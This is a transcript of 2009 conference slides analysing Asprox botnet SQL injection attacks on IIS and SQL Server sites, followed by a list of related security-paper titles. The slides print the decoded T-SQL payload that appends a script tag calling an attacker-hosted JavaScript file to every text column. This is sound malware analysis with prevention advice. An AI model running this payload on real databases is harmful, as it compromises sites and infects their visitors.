Botnet-Powered SQL Injection Attacks A Deeper Look Within (VB, Sep. 2009) David Maciejak Guillaume Lovet
|
|
|
- Philomena Green
- 7 years ago
- Views:
Transcription
1 Botnet-Powered SQL Injection Attacks A Deeper Look Within (VB, Sep. 2009) David Maciejak Guillaume Lovet
2 Agenda The Beginning Attack Analysis Malicious Injected JS 4 Threat Evolution 5 Prevention 2
3 The Beginning May 2008: new Asprox Botnet variant *using Google dorks to find SQL servers *using HTTP Get bruteforce for SQL injection => millions reported attempts => many successful compromised targets 3
4 Agenda The Beginning Attack Analysis Malicious Injected JS 4 Threat Evolution 5 Prevention 4
5 Attack Analysis First attack reported to us: GET *GET requests can be found in web server logs *seems obfuscated SQL injection is appended to variable 'id' value 5
6 Attack Analysis Clean up: NVARCHAR(4000); AS String variable is executed (EXEC function) *CAST function is used to obfuscate chars, converts hexadecimal chars to ASCII value 6
7 Attack Analysis How to decode 0x C ? *easy: NULL chars added between each chars Hexa to ascii gives: 0x44 = D 0x45 = E 0x43 = C 0x4C = L... 7
8 Using Perl Kung-Fu gives the whole code varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype= u and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec( update [ +@T+ ] set [ +@C+ ]=rtrim(convert(va rchar,[ +@C+ ]))+ <script src= com/7.js></script> )FETCH NEXT FROM Table_Cursor END CLOSE Table_Cursor 8 DEALLOCATE Table_Cursor
![xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @ T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec( update [ +@T+ ] set [ +@C+](/docs-images/44/18722646/images/page_8.jpg "]=rtrim(convert(va rchar,[ +@C+ ]))+ <script src=http://www.directxx. com/7.")
9 Attack Analysis Facts: *Asprox variant is searching for ASP pages => targeting Microsoft IIS *the code is written in Transact-SQL => targeting Microsoft SQL Server 9
10 Attack Analysis What does this statement do? select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype= u and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) It queries system tables named 'sysobjects' and 'syscolumns' 10
11 Attack Analysis sysobjects xtype= u =>filter data type object for User table syscolumns xtype=99 or xtype=35 or xtype=231 or xtype=167 =>filter physical storage type for 35 (text), 99 (ntext), 167 (varchar), 231 (nvarchar) = Statement returns all user tables and columns of type type. 11
12 varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype= u and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec( update [ +@T+ ] set [ +@C+ ]=rtrim(convert(va rchar,[ +@C+ ]))+ <script src= com/7.js></script> )FETCH NEXT FROM Table_Cursor END CLOSE Table_Cursor DEALLOCATE Table_Cursor 12
![xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @ T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec( update [ +@T+ ] set [](/docs-images/44/18722646/images/page_12.jpg "+@C+ ]=rtrim(convert(va rchar,[ +@C+ ]))+ <script src=http://www.directxx. com/7.")
13 varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype= u and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec( update [ +@T+ ] set [ +@C+ ]=rtrim(convert(va rchar,[ +@C+ ]))+ <script src=hxxp:// com/7.js></script> )FETCH NEXT FROM Table_Cursor END CLOSE Table_Cursor DEALLOCATE Table_Cursor 13
![xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @ T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec( update [ +@T+ ] set [](/docs-images/44/18722646/images/page_13.jpg "+@C+ ]=rtrim(convert(va rchar,[ +@C+ ]))+ <script src=hxxp://www.directxx. com/7.")
14 Attack Analysis exec( update [ +@T+ ] set [ +@ C+ ]= rtrim(convert(varchar,[ +@ C+ ])) + execute statement string concatenation update statement String conversion <script src=hxxp:// ) malicious HTML snippet 14
15 Agenda The Beginning Attack Analysis Malicious Injected JS 4 Threat Evolution 5 Prevention 15
16 Malicious Injected JS Redirects to all-in-one web exploit toolkit > 10 attacks ActiveX, Flash, Quicktime, no PDF at that time MS06-014, CVE , CVE , CVE , BID:29118, CVE , CVE , CVE , CVE CVE , CVE , MS Purpose: *download and execute malicious files on the victim's system 16
17 Agenda The Beginning Attack Analysis Malicious Injected JS Threat Evolution 5 Prevention 17
18 Threat Evolution * use of search engine to find victims * more attacks, speed up in exploitation campaign * not new, similar SQL injection trick was used in 2007 but not widely distributed *T-SQL script evolving: version using iframe tag or conditional infection 18
19 Threat Evolution * use of search engine to find victims * more attacks, speed up in exploitation campaign * not new, similar SQL injection trick was used in 2007 but not widely distributed *T-SQL script evolving: version using iframe tag or conditional infection 19
20 Prevention * web code analyzing, sanitize user input * use IPS to filter incoming HTTP requests containing SQL patterns or web application firewall to force filtering 20
21 21 Thanks
Understanding Web Application Security Issues
Understanding Web Application Security Issues Pankaj Sharma January 30, 2009 Indian Computer Emergency Response Team ( CERT - IN ) Department Of Information Technology 1 Agenda Introduction What are Web
SQL Injection. Slides thanks to Prof. Shmatikov at UT Austin
SQL Injection Slides thanks to Prof. Shmatikov at UT Austin Dynamic Web Application GET / HTTP/1.0 Browser HTTP/1.1 200 OK Web server index.php Database server slide 2 PHP: Hypertext Preprocessor Server
CIS 433/533 - Computer and Network Security. Web Vulnerabilities, Wrapup
CIS 433/533 - Computer and Network Security Web Vulnerabilities, Wrapup Professor Kevin Butler Winter 2011 Computer and Information Science Injection Attacks flaws relating to invalid input handling which
To Cache a Thief Using database caches to detect SQL injection attacks. Kevvie Fowler, CISSP, GCFA Gold, MCTS, MCDBA, MCSD, MCSE
To Cache a Thief Using database caches to detect SQL injection attacks Kevvie Fowler, CISSP, GCFA Gold, MCTS, MCDBA, MCSD, MCSE About me Day job: Director Security Services, TELUS backed by Emergis Night
Introduction to Web Application Firewalls. Dustin Anders
Introduction to Web Application Firewalls Dustin Anders Today s Presenter Dustin Anders, CISSP Senior Security Engineer w/ Imperva Implemented security solutions for large enterprises since 1997 (State
Evil Though the Lens of Web Logs
Evil Though the Lens of Web Logs Russ McRee Microsoft SANS Internet Storm Center Session ID: HT2-403 Session Classification: Intermediate Evil Though the Lens of Web Logs A quick justification for talking
[state of the internet] / SEO Attacks. Threat Advisory: Continuous Uptick in SEO Attacks
![[state of the internet] / SEO Attacks. Threat Advisory: Continuous Uptick in SEO Attacks](/thumbs/36/17600806.jpg "[state of the internet] / SEO Attacks. Threat Advisory: Continuous Uptick in SEO Attacks")
TLP: GREEN Issue Date: 1.12.16 Threat Advisory: Continuous Uptick in SEO Attacks Risk Factor High The Akamai Threat Research Team has identified a highly sophisticated Search Engine Optimization (SEO)
Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
Black Hat Briefings USA 2004 Cameron Hotchkies cameron@0x90.org
Blind SQL Injection Automation Techniques Black Hat Briefings USA 2004 Cameron Hotchkies cameron@0x90.org What is SQL Injection? Client supplied data passed to an application without appropriate data validation
RIA SECURITY TECHNOLOGY
RIA SECURITY TECHNOLOGY Ulysses Wang Security Researcher, Websense Hermes Li Security Researcher, Websense 2009 Websense, Inc. All rights reserved. Agenda RIA Introduction Flash Security Attack Vectors
Shellshock. Oz Elisyan & Maxim Zavodchik
Shellshock By Oz Elisyan & Maxim Zavodchik INTRODUCTION Once a high profile vulnerability is released to the public, there will be a lot of people who will use the opportunity to take advantage on vulnerable
SQL injection: Not only AND 1=1. The OWASP Foundation. Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd
SQL injection: Not only AND 1=1 Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd bernardo.damele@gmail.com +44 7788962949 Copyright Bernardo Damele Assumpcao Guimaraes Permission
SQL Injection 2.0: Bigger, Badder, Faster and More Dangerous Than Ever. Dana Tamir, Product Marketing Manager, Imperva
SQL Injection 2.0: Bigger, Badder, Faster and More Dangerous Than Ever Dana Tamir, Product Marketing Manager, Imperva Consider this: In the first half of 2008, SQL injection was the number one attack vector
Webapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
Manipulating Microsoft SQL Server Using SQL Injection
Manipulating Microsoft SQL Server Using SQL Injection Author: Cesar Cerrudo (sqlsec@yahoo.com) APPLICATION SECURITY, INC. WEB: E-MAIL: INFO@APPSECINC.COM TEL: 1-866-9APPSEC 1-212-947-8787 INTRODUCTION
Using SQL Server Management Studio
Using SQL Server Management Studio Microsoft SQL Server Management Studio 2005 is a graphical tool for database designer or programmer. With SQL Server Management Studio 2005 you can: Create databases
Cross Site Scripting in Joomla Acajoom Component
Whitepaper Cross Site Scripting in Joomla Acajoom Component Vandan Joshi December 2011 TABLE OF CONTENTS Abstract... 3 Introduction... 3 A Likely Scenario... 5 The Exploit... 9 The Impact... 12 Recommended
Automating SQL Injection Exploits
Automating SQL Injection Exploits Mike Shema IT Underground, Berlin 2006 Overview SQL injection vulnerabilities are pretty easy to detect. The true impact of a vulnerability is measured
SECURING APACHE : THE BASICS - III
SECURING APACHE : THE BASICS - III Securing your applications learn how break-ins occur Shown in Figure 2 is a typical client-server Web architecture, which also indicates various attack vectors, or ways
SQL INJECTION ATTACKS
6 SQL INJECTION ATTACKS INFORMATION IN THIS CHAPTER What Is an SQL Injection Attack? Why Are SQL Injection Attacks So Successful? How to Protect Yourself from an SQL Injection Attack Cleaning Up the Database
Securing and Accelerating Databases In Minutes using GreenSQL
Securing and Accelerating Databases In Minutes using GreenSQL Unified Database Security All-in-one database security and acceleration solution Simplified management, maintenance, renewals and threat update
Preparing for the Cross Site Request Forgery Defense
Preparing for the Cross Site Request Forgery Defense Chuck Willis chuck.willis@mandiant.com Black Hat DC 2008 February 20, 2008 About Me Principal Consultant with MANDIANT in Alexandria, VA Full spectrum
Web-Application Security
Web-Application Security Kristian Beilke Arbeitsgruppe Sichere Identität Fachbereich Mathematik und Informatik Freie Universität Berlin 29. Juni 2011 Overview Web Applications SQL Injection XSS Bad Practice
INTRUSION PROTECTION AGAINST SQL INJECTION ATTACKS USING REVERSE PROXY
INTRUSION PROTECTION AGAINST SQL INJECTION ATTACKS USING REVERSE PROXY Asst.Prof. S.N.Wandre Computer Engg. Dept. SIT,Lonavala University of Pune, snw.sit@sinhgad.edu Gitanjali Dabhade Monika Ghodake Gayatri
Acunetix Website Audit. 5 November, 2014. Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build 20120808)
Acunetix Website Audit 5 November, 2014 Developer Report Generated by Acunetix WVS Reporter (v8.0 Build 20120808) Scan of http://filesbi.go.id:80/ Scan details Scan information Starttime 05/11/2014 14:44:06
Beyond Aurora s Veil: A Vulnerable Tale
Beyond Aurora s Veil: A Vulnerable Tale Derek Manky Cyber Security & Threat Research FortiGuard Labs October 26th, 2010: SecTor 2010 Toronto, CA Conficker: April Doomsday.. Meanwhile JBIG2 Zero Day PDF/SWF
The Dark Side of Trusting Web Searches From Blackhat SEO to System Infection
The Dark Side of Trusting Web Searches From Blackhat SEO to System Infection Trend Micro, Incorporated Marco Dela Vega and Norman Ingal Threat Response Engineers A Trend Micro Research Paper I November
CTF Web Security Training. Engin Kirda ek@ccs.neu.edu
CTF Web Security Training Engin Kirda ek@ccs.neu.edu Web Security Why It is Important Easiest way to compromise hosts, networks and users Widely deployed ( payload No Logs! (POST Request Difficult to defend
Networks and Security Lab. Network Forensics
Networks and Security Lab Network Forensics Network Forensics - continued We start off from the previous week s exercises and analyze each trace file in detail. Tools needed: Wireshark and your favorite
CS 558 Internet Systems and Technologies
CS 558 Internet Systems and Technologies Dimitris Deyannis deyannis@csd.uoc.gr 881 Heat seeking Honeypots: Design and Experience Abstract Compromised Web servers are used to perform many malicious activities.
Magento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
SQL Database Administration. Overview
SQL Database Administration SQL Database Administration...1 Backing Up Your Data...2 Controlling Database Growth...7 Maintaining Optimum Performance...10 Automatic Updates for Windows...12 Overview This
ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
How I hacked PacketStorm (1988-2000)
Outline Recap Secure Programming Lecture 8++: SQL Injection David Aspinall, Informatics @ Edinburgh 13th February 2014 Overview Some past attacks Reminder: basics Classification Injection route and motive
Overview of SQL Injection
Overview of SQL Injection From Web Sources by J. Scott, 10/2009 Page 1 of 10 Overview of SQL Injection This white paper assumes you have a working knowledge of SQL injection. However, a brief refresher
Bypassing Internet Explorer s XSS Filter
Bypassing Internet Explorer s XSS Filter Or: Oops, that s not supposed to happen. Carlos @RTWaysea About Me Mechanical Drafting Background Engine parts, Architectural fixtures, etc. Friend said Try This
Dan Hubbard VP Security Research
Dan Hubbard VP Security Research Perpetual Beta = Live Testing = Trouble Airline Terminals using Active Script Start : Middle : End Wait, the Web has version numbers? Web Two Dot UH-OH or Exploit 2.0 An
Microsoft SQL Server Scheduling
Microsoft SQL Server Scheduling Table of Contents INTRODUCTION 3 MSSQL EXPRESS DATABASE SCHEDULING 3 SQL QUERY FOR BACKUP 3 CREATION OF BATCH FILE 6 CREATE NEW SCHEDULER JOB 6 SELECT THE PROGRAM FOR SCHEDULING
Module 1: Getting Started with Databases and Transact-SQL in SQL Server 2008
Course 2778A: Writing Queries Using Microsoft SQL Server 2008 Transact-SQL About this Course This 3-day instructor led course provides students with the technical skills required to write basic Transact-
Indian Computer Emergency Response Team (CERT-In) Annual Report (2010)
Indian Computer Emergency Response Team (CERT-In) Annual Report (2010) Indian Computer Emergency Response Team (CERT-In) Department of Information Technology Ministry of Communications & Information Technology
Writing Queries Using Microsoft SQL Server 2008 Transact-SQL
Course 2778A: Writing Queries Using Microsoft SQL Server 2008 Transact-SQL Length: 3 Days Language(s): English Audience(s): IT Professionals Level: 200 Technology: Microsoft SQL Server 2008 Type: Course
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
Malicious Network Traffic Analysis
Malicious Network Traffic Analysis Uncover system intrusions by identifying malicious network activity. There are a tremendous amount of network based attacks to be aware of on the internet today and the
Implementation of Web Application Firewall
Implementation of Web Application Firewall OuTian 1 Introduction Abstract Web 層 應 用 程 式 之 攻 擊 日 趨 嚴 重, 而 國 內 多 數 企 業 仍 不 知 該 如 何 以 資 安 設 備 阻 擋, 仍 在 採 購 傳 統 的 Firewall/IPS,
DIPLOMA IN WEBDEVELOPMENT
DIPLOMA IN WEBDEVELOPMENT Prerequisite skills Basic programming knowledge on C Language or Core Java is must. # Module 1 Basics and introduction to HTML Basic HTML training. Different HTML elements, tags
USING FILERELICATIONPRO TO REPLICATE SQL SERVER
USING FILERELICATIONPRO TO REPLICATE SQL SERVER Abstract FileReplicationPro (FRP) can be used to backup your SQL Server databases. The replication procedure is not as straight forward as replicating other
Security Awareness For Website Administrators. State of Illinois Central Management Services Security and Compliance Solutions
Security Awareness For Website Administrators State of Illinois Central Management Services Security and Compliance Solutions Common Myths Myths I m a small target My data is not important enough We ve
Web Application Worms & Browser Insecurity
Web Application Worms & Browser Insecurity Mike Shema Welcome Background Hacking Exposed: Web Applications The Anti-Hacker Toolkit Hack Notes: Web Security Currently working at Qualys
Analysis of the Australian Web Threat Landscape Christopher Ke, Jonathan Oliver and Yang Xiang
Analysis of the Australian Web Threat Landscape Christopher Ke, Jonathan Oliver and Yang Xiang Deakin University, 221 Burwood Highway, Burwood, Victoria 3125, Australia Trend Micro 606 St Kilda Road, Melbourne,
Best Practices in SQL Programming. Madhivanan
Best Practices in SQL Programming Madhivanan Do not use irrelevant datatype VARCHAR instead of DATETIME CHAR(N) instead of VARCHAR(N) etc Do not use VARCHAR instead of DATETIME create table #employee_master(emp_id
Advancements in Botnet Attacks and Malware Distribution
Advancements in Botnet Attacks and Malware Distribution HOPE Conference, New York, July 2012 Aditya K Sood Rohit Bansal Richard J Enbody SecNiche Security Department of Computer Science and Engineering
Writing Queries Using Microsoft SQL Server 2008 Transact-SQL
Lincoln Land Community College Capital City Training Center 130 West Mason Springfield, IL 62702 217-782-7436 www.llcc.edu/cctc Writing Queries Using Microsoft SQL Server 2008 Transact-SQL Course 2778-08;
Client vs. Server Implementations of Mitigating XSS Security Threats on Web Applications
Journal of Basic and Applied Engineering Research pp. 50-54 Krishi Sanskriti Publications http://www.krishisanskriti.org/jbaer.html Client vs. Server Implementations of Mitigating XSS Security Threats
How to schedule and automate backups of SQL Server databases in SQL Server Express Editions
How to schedule and automate backups of SQL Server databases in SQL Server Express Editions View products that this article applies to. Expand all Collapse all Summary SQL Server Express editions do not
Attacks on Clients: Dynamic Content & XSS
Software and Web Security 2 Attacks on Clients: Dynamic Content & XSS (Section 7.1.3 on JavaScript; 7.2.4 on Media content; 7.2.6 on XSS) sws2 1 Recap from last lecture Attacks on web server: attacker/client
Check list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
Cross-Site Scripting
Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer (fabrice.bodmer@unifr.ch) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some
Vulnerability-Focused Threat Detection: Protect Against the Unknown
Vulnerability-Focused Threat Detection: Protect Against the Unknown Vulnerabilities and threats are being discovered at a pace that traditional exploit-based attack detection technology cannot meet. Vulnerability-focused
Exploring the Black Hole Exploit Kit
Exploring the Black Hole Exploit Kit Updated December 20, 2011 Internet Identity Threat Intelligence Department http://www.internetidentity.com http://www.internetidentity.com 12/29/11 Page 1/20 Summary
The SQL Injection and Signature Evasion
The SQL Injection and Signature Evasion Protecting Web Sites Against SQL Injection SQL injection is one of the most common attack strategies employed by attackers to steal identity and other sensitive
Intrusion detection for web applications
Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities
White Paper. SQL Injection 2.0. Protecting Web Sites from Automated and Advanced SQL Injection
Protecting Web Sites from Automated and Advanced SQL Injection White Paper SQL Injection continues to be one of the most predominant Web application threats. In the first half of 2008, SQL injection was
Spam and All Things Salty: Spambot v2013
Spam and All Things Salty: Spambot v2013 Jessa dela Torre 1 and Sabrina Lei Sioting 2 1 Forward-Looking Threat Research Team 2 Threat Cleanup and Analysis Team Trend Micro, Inc., Philippines Abstract.
WEB ATTACKS AND COUNTERMEASURES
WEB ATTACKS AND COUNTERMEASURES February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in
Advanced PostgreSQL SQL Injection and Filter Bypass Techniques
Advanced PostgreSQL SQL Injection and Filter Bypass Techniques INFIGO-TD TD-200 2009-04 2009-06 06-17 Leon Juranić leon.juranic@infigo.hr INFIGO IS. All rights reserved. This document contains information
Detection of SQL Injection and XSS Vulnerability in Web Application
International Journal of Engineering and Applied Sciences (IJEAS) ISSN: 2394-3661, Volume-2, Issue-3, March 2015 Detection of SQL Injection and XSS Vulnerability in Web Application Priti Singh, Kirthika
Threat Intelligence UPDATE: Cymru EIS Report. www.team- cymru.com
Threat Intelligence Group UPDATE UPDATE: SOHO Pharming A Team Cymru EIS Report Powered Page by T1eam Threat Intelligence Group of 5 C ymru s This is an update on the SOHO Pharming case we published a little
What do a banking Trojan, Chrome and a government mail server have in common? Analysis of a piece of Brazilian malware
What do a banking Trojan, Chrome and a government mail server have in common? Analysis of a piece of Brazilian malware Contents Introduction.................................2 Installation: Social engineering
Detect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map
Detect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map Erwin Adi and Irene Salomo School of Computer Science BINUS International BINUS University, Indonesia
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework ajin25@gmail.com keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.
white paper Malware Security and the Bottom Line
Malware Security Report: Protecting Your BusineSS, Customers, and the Bottom Line Contents 1 Malware is crawling onto web sites everywhere 1 What is Malware? 2 The anatomy of Malware attacks 3 The Malware
What? Me, Worry? I've Already Been Hacked. Haven't You?
What? Me, Worry? I've Already Been Hacked. Haven't You? David Maman Co-Founder, CTO GreenSQL Session ID: Session Classification: DSP-F43 General Interest #1 Global Security Challenge Sophisticated attacks:
Attack and Penetration Testing 101
Attack and Penetration Testing 101 Presented by Paul Petefish PaulPetefish@Solutionary.com July 15, 2009 Copyright 2000-2009, Solutionary, Inc. All rights reserved. Version 2.2 Agenda Penetration Testing
Complete Cross-site Scripting Walkthrough
Complete Cross-site Scripting Walkthrough Author : Ahmed Elhady Mohamed Email : ahmed.elhady.mohamed@gmail.com website: www.infosec4all.tk blog : www.1nfosec4all.blogspot.com/ [+] Introduction wikipedia
What is Web Security? Motivation
brucker@inf.ethz.ch http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
Cross-Site-Scripting (XSS)
Bachelor s Thesis Degree Programme in Information Technology 2009 YongHao Li Cross-Site-Scripting (XSS) Attacking and Defending II BACHELOR Ś THESIS ABSTRACT TURKU UNIVERSITY OF APPLIED SCIENCES Degree
Botnets Die Hard Owned and Operated
Botnets Die Hard Owned and Operated,,, Las Vegas, 2012 Aditya K Sood Richard J Enbody SecNiche Security Department of Computer Science and Engineering Michigan State University Aditya K Sood About Us PhD
Operation Liberpy : Keyloggers and information theft in Latin America
Operation Liberpy : Keyloggers and information theft in Latin America Diego Pérez Magallanes Malware Analyst Pablo Ramos HEAD of LATAM Research Lab 7/7/2015 version 1.1 Contents Introduction... 3 Operation
How To Fix A Web Application Security Vulnerability
Proposal of Improving Web Application Security in Context of Latest Hacking Trends RADEK VALA, ROMAN JASEK Department of Informatics and Artificial Intelligence Tomas Bata University in Zlin, Faculty of
EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.
CENTER FOR ADVANCED SECURITY TRAINING 619 Advanced SQLi Attacks and Countermeasures Make The Difference About Center of Advanced Security Training () The rapidly evolving information security landscape
Description: Course Details:
Course: Malicious Network Traffic Analysis Duration: 5 Day Hands-On Lab & Lecture Course Price: $ 3,495.00 Description: There are a tremendous amount of network based attacks to be aware of on the internet
Web Application Guidelines
Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security
Blackhole Exploit Kit: A Spam Campaign, Not a Series of Individual Spam Runs AN IN-DEPTH ANALYSIS
Trend Micro Incorporated Research Paper 2012 Blackhole Exploit Kit: A Spam Campaign, Not a Series of Individual Spam Runs AN IN-DEPTH ANALYSIS By: Jon Oliver, Sandra Cheng, Lala Manly, Joey Zhu, Roland
Advanced Queries and Linked Servers
Advanced Queries and Linked Servers Advanced Queries and Linked Servers Objectives Create dynamic SQL in stored procedures. Use SQL Server cursors. Learn how to partition data horizontally. Create partitioned
MCAFEE FOUNDSTONE FSL UPDATE
MCAFEE FOUNDSTONE FSL UPDATE 2012-JUN-13 To better protect your environment McAfee has created this FSL check update for the Foundstone Product Suite. The following is a detailed summary of the new and
Rise of the Machines: An Internet-Wide Analysis of Web Bots in 2014
SESSION ID: SPO2-W04 Rise of the Machines: An Internet-Wide Analysis of Web Bots in 2014 John Summers VP, Security Products Akamai #RSAC The Akamai Intelligent Platform The Platform 167,000+ Servers 2,300+
HTTPParameter Pollution. ChrysostomosDaniel
HTTPParameter Pollution ChrysostomosDaniel Introduction Nowadays, many components from web applications are commonly run on the user s computer (such as Javascript), and not just on the application s provider
Data Breaches and Web Servers: The Giant Sucking Sound
Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant
SQL Server An Overview
SQL Server An Overview SQL Server Microsoft SQL Server is designed to work effectively in a number of environments: As a two-tier or multi-tier client/server database system As a desktop database system
Streamlining Web and Email Security
How to Protect Your Business from Malware, Phishing, and Cybercrime The SMB Security Series Streamlining Web and Email Security sponsored by Introduction to Realtime Publishers by Don Jones, Series Editor
Performance Implications of Various Cursor Types in Microsoft SQL Server. By: Edward Whalen Performance Tuning Corporation
Performance Implications of Various Cursor Types in Microsoft SQL Server By: Edward Whalen Performance Tuning Corporation INTRODUCTION There are a number of different types of cursors that can be created
Be Prepared for Java Zero-day Attacks
Threat Report Be Prepared for Java Zero-day Attacks Malware Analysis: Malicious Codes spread via cloud-based data storage services December 19, 2013 Content Overview... 3 Distributing Malicious E-mails
Where every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
Single Sign-On for the Internet: A Security Story. Eugene Tsyrklevich eugene@tsyrklevich.name Vlad Tsyrklevich vlad902@gmail.com
Single Sign-On for the Internet: A Security Story Eugene Tsyrklevich eugene@tsyrklevich.name Vlad Tsyrklevich vlad902@gmail.com BlackHat USA, Las Vegas 2007 Introduction With the explosion of Web 2.0 technology,
Hack Proof Your Webapps
Hack Proof Your Webapps About ERM About the speaker Web Application Security Expert Enterprise Risk Management, Inc. Background Web Development and System Administration Florida International University
External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
Introduction to Computer Security
Introduction to Computer Security Web Application Security Pavel Laskov Wilhelm Schickard Institute for Computer Science Modern threat landscape The majority of modern vulnerabilities are found in web
SQL Injection. By Artem Kazanstev, ITSO and Alex Beutel, Student
SQL Injection By Artem Kazanstev, ITSO and Alex Beutel, Student SANS Priority No 2 As of September 2009, Web application vulnerabilities such as SQL injection and Cross-Site Scripting flaws in open-source
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange
Malware B-Z: Inside the Threat From Blackhole to ZeroAccess
Malware B-Z: Inside the Threat From Blackhole to ZeroAccess By Richard Wang, Manager, SophosLabs U.S. Over the last few years the volume of malware has grown dramatically, thanks mostly to automation and